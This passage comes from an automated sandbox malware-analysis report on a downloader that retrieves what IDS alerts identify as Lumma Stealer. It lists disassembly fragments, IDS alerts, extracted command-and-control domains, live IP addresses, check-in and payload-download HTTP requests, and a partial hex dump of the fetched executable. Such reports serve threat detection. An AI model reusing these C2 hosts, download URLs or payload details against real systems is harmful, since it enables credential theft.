                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 4x nop then mov edx, eax2_2_024D7797
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 4x nop then mov ebx, edi2_2_024CD4D7
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 4x nop then lea eax, dword ptr [esp+18h]2_2_024D54D1
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 4x nop then movzx ebx, byte ptr [edi+eax]2_2_024C554C
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 4x nop then movzx edi, byte ptr [edx+eax-000000A8h]2_2_024C6544
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 4x nop then cmp dword ptr [ecx+edi*8], 2298EE00h2_2_024ED557
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 4x nop then movzx edx, word ptr [eax]2_2_024ED557
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 4x nop then mov word ptr [eax], cx2_2_024CC528
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 4x nop then cmp dword ptr [ebx+esi*8], B430E561h2_2_024D552B
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 4x nop then mov word ptr [ebp+00h], 0000h2_2_024D559D
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 4x nop then cmp dword ptr [ebx+esi*8], B430E561h2_2_024D55B3
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 4x nop then movzx edx, byte ptr [esi+eax-00000089h]2_2_024BDA09
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 4x nop then movzx edx, byte ptr [esi+eax-00000089h]2_2_024BDA09
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 4x nop then movzx ebx, byte ptr [eax+ecx-3F9DFECCh]2_2_024BEAA2
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+38h]2_2_024BCB7E
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 67F3D776h2_2_024D5BF7
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 4x nop then movzx ecx, di2_2_024D5BF7
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 4x nop then mov ecx, eax2_2_024BABA7
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 4x nop then mov edx, ecx2_2_024BABA7
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+000000B8h]2_2_024DB75E
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 4x nop then mov ecx, eax2_2_024DB75E
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 4x nop then mov ecx, eax2_2_024C4806
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 4x nop then cmp word ptr [ebx+ecx], 0000h2_2_024D0817
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 4x nop then movzx ebx, byte ptr [edx]2_2_024E3897
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 4x nop then mov byte ptr [esi], cl2_2_024DC8B1
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 4x nop then mov byte ptr [esi], cl2_2_024DC94B
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-78E52646h]2_2_024B9967
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 4x nop then movzx edi, byte ptr [esp+eax-46h]2_2_024B9967
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+16h]2_2_024B9967
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 4x nop then mov word ptr [eax], cx2_2_024C6907
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 4x nop then mov eax, edx2_2_024CC921
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 4x nop then movzx edi, byte ptr [esp+ecx+0233DBB1h]2_2_024D89C0
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 4x nop then mov edx, dword ptr [ebp-10h]2_2_024EA9DE
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], A896961Ch2_2_024C99D7
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 6E83E51Eh2_2_024C99D7
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], 6E83E51Eh2_2_024C99D7
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 67F3D776h2_2_024C99D7
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 67F3D776h2_2_024C99D7
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], B7C1BB11h2_2_024C99D7
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 6E83E51Eh2_2_024C99D7
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], B430E561h2_2_024C99D7
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 4x nop then mov byte ptr [esi], cl2_2_024DC98D
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 4x nop then mov byte ptr [esi], cl2_2_024DC99C
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 4x nop then mov ebp, dword ptr [eax]2_2_024E6E67
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 4x nop then mov word ptr [eax], dx2_2_024C5F79
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 4x nop then mov ecx, eax2_2_024D1F77
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 4x nop then mov word ptr [ebx], dx2_2_024C8F35
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 4x nop then mov word ptr [ebx], cx2_2_024C8F35
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 4x nop then cmp dword ptr [edi+ebp*8], E88DDEA1h2_2_024ECFC7
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 4x nop then movzx edi, byte ptr [edx+ecx]2_2_024BDF8C
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 4x nop then movsx eax, byte ptr [esi]2_2_024EBC08
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]2_2_024D9C17
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 4x nop then movzx ebx, byte ptr [ecx+edx]2_2_024CEC17
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], A269EEEFh2_2_024E6C3B
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 4x nop then mov esi, eax2_2_024D3C9B
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 4x nop then mov ecx, eax2_2_024EAD19
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], CAA82E26h2_2_024ECD87

                Networking

                barindex
                Source: Network trafficSuricata IDS: 2058222 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (immureprech .biz) : 192.168.2.5:63478 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058214 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (deafeninggeh .biz) : 192.168.2.5:49702 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058223 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (immureprech .biz in TLS SNI) : 192.168.2.5:49706 -> 104.131.68.180:443
                Source: Network trafficSuricata IDS: 2058218 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (diffuculttan .xyz) : 192.168.2.5:60957 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058226 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sordid-snaked .cyou) : 192.168.2.5:65226 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058216 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (debonairnukk .xyz) : 192.168.2.5:51454 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2822521 - Severity 1 - ETPRO MALWARE Malicious SSL Certificate Detected (Linux.Rex Scanner) : 104.131.68.180:443 -> 192.168.2.5:49706
                Source: Network trafficSuricata IDS: 2058226 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sordid-snaked .cyou) : 192.168.2.5:61916 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058210 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (awake-weaves .cyou) : 192.168.2.5:55725 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058215 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (deafeninggeh .biz in TLS SNI) : 192.168.2.5:49708 -> 45.77.249.79:443
                Source: Network trafficSuricata IDS: 2822521 - Severity 1 - ETPRO MALWARE Malicious SSL Certificate Detected (Linux.Rex Scanner) : 45.77.249.79:443 -> 192.168.2.5:49708
                Source: Network trafficSuricata IDS: 2058236 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wrathful-jammy .cyou) : 192.168.2.5:62073 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058220 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (effecterectz .xyz) : 192.168.2.5:51781 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49706 -> 104.131.68.180:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49706 -> 104.131.68.180:443
                Source: Network trafficSuricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.5:49715 -> 104.121.10.34:443
                Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49708 -> 45.77.249.79:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49708 -> 45.77.249.79:443
                Source: Malware configuration extractorURLs: immureprech.biz
                Source: Malware configuration extractorURLs: sordid-snaked.cyou
                Source: Malware configuration extractorURLs: debonairnukk.xyz
                Source: Malware configuration extractorURLs: deafeninggeh.biz
                Source: Malware configuration extractorURLs: awake-weaves.cyou
                Source: Malware configuration extractorURLs: effecterectz.xyz
                Source: Malware configuration extractorURLs: diffuculttan.xyz
                Source: Malware configuration extractorURLs: wrathful-jammy.cyou
                Source: DNS query: effecterectz.xyz
                Source: DNS query: diffuculttan.xyz
                Source: DNS query: debonairnukk.xyz
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 17 Dec 2024 07:18:43 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Tue, 17 Dec 2024 07:15:01 GMTETag: "5a000-629720e372f3a"Accept-Ranges: bytesContent-Length: 368640Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 4f 13 29 12 0b 72 47 41 0b 72 47 41 0b 72 47 41 b6 3d d1 41 0a 72 47 41 15 20 c3 41 15 72 47 41 15 20 d2 41 1f 72 47 41 15 20 c4 41 65 72 47 41 2c b4 3c 41 0c 72 47 41 0b 72 46 41 7d 72 47 41 15 20 cd 41 0a 72 47 41 15 20 d3 41 0a 72 47 41 15 20 d6 41 0a 72 47 41 52 69 63 68 0b 72 47 41 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 67 98 24 66 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 fa 03 00 00 26 3f 00 00 00 00 00 77 18 00 00 00 10 00 00 00 10 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 20 43 00 00 04 00 00 91 97 06 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 fc 29 04 00 3c 00 00 00 00 10 42 00 a8 0c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 04 00 94 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1c f8 03 00 00 10 00 00 00 fa 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 0e 23 00 00 00 10 04 00 00 24 00 00 00 fe 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 bc c4 3d 00 00 40 04 00 00 70 00 00 00 22 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 a8 0c 01 00 00 10 42 00 00 0e 01 00 00 92 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                Source: Joe Sandbox ViewIP Address: 45.77.249.79 45.77.249.79
                Source: Joe Sandbox ViewIP Address: 104.21.56.70 104.21.56.70
                Source: Joe Sandbox ViewIP Address: 104.131.68.180 104.131.68.180
                Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49705 -> 176.113.115.19:80
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49706 -> 104.131.68.180:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49708 -> 45.77.249.79:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49715 -> 104.121.10.34:443
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49704 -> 104.21.56.70:443
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: immureprech.biz
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: deafeninggeh.biz
                Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeCode function: 0_2_004029F4 InternetOpenW,InternetOpenUrlW,GetTempPathW,GetTempFileNameW,CreateFileW,InternetReadFile,WriteFile,CloseHandle,CloseHandle,ShellExecuteExW,WaitForSingleObject,CloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_004029F4
                Source: global trafficHTTP traffic detected: GET /track_prt.php?sub=0&cc=DE HTTP/1.1User-Agent: ShareScreenHost: post-to-me.com
                Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
                Source: global trafficHTTP traffic detected: GET /ScreenUpdateSync.exe HTTP/1.1User-Agent: ShareScreenHost: 176.113.115.19
                Source: 8BB0.tmp.exe, 00000002.00000003.2287094068.00000000009B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
                Source: 8BB0.tmp.exe, 00000002.00000003.2287094068.000000000095B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=Nonesessionid=962e3ca250d10fc8fbc2ea3a; Path=/; Secure; SameSite=NoneSet-CookienginxServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon, 26 Jul 1997 05:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset=UTF-8Content-Type25665Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerPragmaKeep-AliveTue, 17 Dec 2024 07:18:56 GMTDateProxy-ConnectioncloseConnectionno-cacheCache-Control equals www.youtube.com (Youtube)
                Source: 8BB0.tmp.exe, 00000002.00000003.2287094068.000000000095B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
                Source: global trafficDNS traffic detected: DNS query: post-to-me.com
                Source: global trafficDNS traffic detected: DNS query: sordid-snaked.cyou
                Source: global trafficDNS traffic detected: DNS query: immureprech.biz
                Source: global trafficDNS traffic detected: DNS query: deafeninggeh.biz
                Source: global trafficDNS traffic detected: DNS query: effecterectz.xyz
                Source: global trafficDNS traffic detected: DNS query: diffuculttan.xyz
                Source: global trafficDNS traffic detected: DNS query: debonairnukk.xyz
                Source: global trafficDNS traffic detected: DNS query: wrathful-jammy.cyou
                Source: global trafficDNS traffic detected: DNS query: awake-weaves.cyou
                Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
                Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: immureprech.biz
                Source: 8BB0.tmp.exe, 00000002.00000003.2287094068.000000000095B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:27060
                Source: DG55Gu1yGM.exe, DG55Gu1yGM.exe, 00000000.00000003.2164609961.00000000005C4000.00000004.00000020.00020000.00000000.sdmp, DG55Gu1yGM.exe, 00000000.00000002.4557144801.00000000005C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exe
                Source: DG55Gu1yGM.exe, 00000000.00000003.2164609961.00000000005C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exe$
                Source: DG55Gu1yGM.exe, 00000000.00000003.2164609961.00000000005C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exe0
